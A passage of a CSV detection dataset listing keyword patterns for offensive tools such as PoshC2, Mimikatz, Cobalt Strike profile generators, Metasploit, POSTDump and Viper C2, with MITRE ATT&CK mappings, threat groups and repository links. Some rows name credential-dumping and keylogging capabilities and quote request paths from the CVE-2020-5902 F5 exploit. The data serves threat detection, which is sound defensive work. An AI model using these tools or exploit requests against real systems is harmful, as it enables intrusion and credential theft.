TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*poshc2.server*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*poshc2.service*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*poshc2-ansible-main.yml*,offensive_tool_keyword,poshc2,PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. 
a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*posh-cookie-decryptor*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*posh-delete *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - 
HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*poshkatz.psd1*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Stealthbits/poshkatz,1,1,N/A,10,3,210,33,2019-12-28T15:53:40Z,2018-10-29T16:07:40Z -*posh-project *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*posh-project -*,offensive_tool_keyword,poshc2,PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. 
DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*posh-server -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*posh-server -*,offensive_tool_keyword,poshc2,PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. 
including Windows. *nix and OSX.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*posh-update *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*POST */tmui/login.jsp/.. /tmui/locallb/workspace/fileSave.jsp*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*POST *fileName=/tmp/1.txt&content=CVE-2020-5902*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*post/windows/gather*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*post_breach_handler.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*post_ex_amsi_disable*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 
- FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*post_ex_keylogger*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*post_ex_obfuscate*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*Post_EX_Process_Name*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*post_ex_smartinject*,offensive_tool_keyword,cobaltstrike,Cobalt Strike 
random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*post_ex_spawnto_x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 
- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*post_ex_spawnto_x86*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*POST_EXPLOIT_DIR*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*post_exploitation.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation 
tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*PostDump.exe *,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,0,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*POSTDump-main*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,1,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*postgres_default_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*postgres_default_user.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*PostMulitDomainSpider.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostMulitMsfGetDomainInfoByBloodHound.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z 
-*PostPowershellPowerViewAddNetUser.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostPowershellPowerViewGetNetGroup.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostPowershellPowerViewGetNetGroupMember.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostPowershellPowerViewGetNetProcess.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - 
T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostPowershellPowerViewUserHunter.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostRewMsfAuxiliaryCVE*.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PostRewMsfExample.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z 
